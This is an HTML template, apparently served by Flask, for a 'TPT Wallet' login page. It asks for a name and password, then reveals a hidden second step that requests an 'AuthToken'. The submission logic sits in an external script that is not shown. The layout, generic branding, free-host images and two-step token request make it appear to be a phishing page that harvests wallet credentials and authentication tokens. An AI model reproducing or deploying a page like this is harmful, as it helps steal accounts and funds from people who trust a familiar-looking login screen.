<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>TPT Wallet</title>
	<meta name="author" content="TPTradix | Buy | Exchange |">
	<meta name="description" content="TPT wallet, sign up or sign in">
	<meta property="og:title" content="TPTradix | Buy | Exchange |" data-shuvi-head="true">
	<meta property="og:site_name" content="TPT Wallet" data-shuvi-head="true">
	<link href="https://fonts.googleapis.com/css2?family=Bungee&family=Bungee+Spice&family=Monoton&family=Paytone+One&family=Poppins&family=Ramabhadra&family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
	<script></script>
</head>
<body>
	<style type="text/css">
		/* MAIN */
		* {
		  margin: 0;
		  padding: 0;
		}

		*,
		*::before,
		*::after {
		  box-sizing: border-box;
		}

		body {
		  width: 100%;
		  height: auto;
		  background-color: #FFFFFF;
		  font-size: 23px;
		  text-align: center;
		}
	</style>
	<style type="text/css">
		.content_header_view {
		  background-color: #FFFFFF;
		  display: flex;
		  width: auto;
		  height: auto;
		  padding: 25px;
		  padding-top: 15px;
		  padding-bottom: 15px;
		}
	</style>
	<style type="text/css">
		.preview {
		  font-size: 20px;
		  padding: 3px;
		  margin: 0px;
		}
	</style>
	<style type="text/css">
		.entry {
		  border: 0;
		  background-color: #f7f9fb;
		  padding: 15px;
		  border-radius: 15px;
		  font-size: 17px;
		  margin-top: 10px;
		  width: 220px;
		  height: 50px;
		}

		input:focus {
			outline: none;
		}
	</style>
	<style type="text/css">
		.btn {
		  border: 0;
		  background-color: transparent;
		  font-size: 18px;
		  color: #1d95c4;
		  padding: 5px;
		  margin-top: 10px;
		}
	</style>
	<style type="text/css">
		.first_f {
		  align-items: center;
		  justify-content: center;
		}
	</style>
	<div class="main" id="main">
		<div id="first" class="view_content">
			<header class="content_header_view">
				<div style="display: flex; align-items: center;">
					<img width="40px" height="40px" src="https://i.ibb.co/Dt7P9SR/logo.png" style="background: #4287f5; border-radius: 50px;">
					<h1 style="font-family: 'Poppins', sans-serif;"class="preview">TPT Wallet</h1>
				</div>
			</header>
			<div style="background: #4287f5; width: auto; height: 1.0px; opacity: .5; margin: 0px; margin-top: 0px;"></div>
			<div>
				<h1 style="font-family: 'Poppins', sans-serif; font-size: 25px; padding: 25px; text-align: center;">Get started with <b style="font-family: 'Ramabhadra'; color: #4287f5;">TPT Wallet</b> right now</h1>
			</div>
			<form name="Form" method="POST" action="" style="margin-left: 35px; margin-right: 35px; height: 35vh" id="first_f" class="first_f">
				<div id="1-step-reg">
					<input class="entry" id="email" type="text" name="email" placeholder="Name" style="font-family: 'Poppins">
					<input class="entry" id="password" type="password" name="password" placeholder="Password" autocomplete="off" style="font-family: 'Poppins">
					<button class="btn" id="create" name="create" type="button" style="display: none; width: 100%">Continue</button>
				</div>
				<div id="2-step-reg", style="display: none;">
					<div>
						<img width="150px" height="150px" src="https://i.postimg.cc/P50brm63/photo-2024-01-24-20-44-24.jpg" alt="auth" style="border-radius: 20px;">
					</div>
					<div>
						<input class="entry" type="text" name="token" id="token" placeholder="AuthToken" style="font-family: 'Poppins'">
						<button class="btn" id="sub" name="create" type="button" style="display: none; width: 100%">Submit</button>
					</div>
				</div>
			</form>
			<div>
				<div id="other_s" style="display: flex; justify-content: center; align-items: center;">
					<div style="background: #4287f5; width: 30%; height: 1.0px; opacity: .5; margin: 0px; margin-top: 0px;"></div>
					<h6 style="font-family: 'Ubuntu'; color: #a2a9b6; margin: 5px;">or log in with</h6>
					<div style="background: #4287f5; width: 30%; height: 1.0px; opacity: .5; margin: 0px; margin-top: 0px;"></div>
				</div>
				<div>
					
				</div>
			</div>
		</div>
	</div>
	<script src="{{ url_for('static', filename='Render/js/index_898667587.js') }}"></script>

</body>
</html>







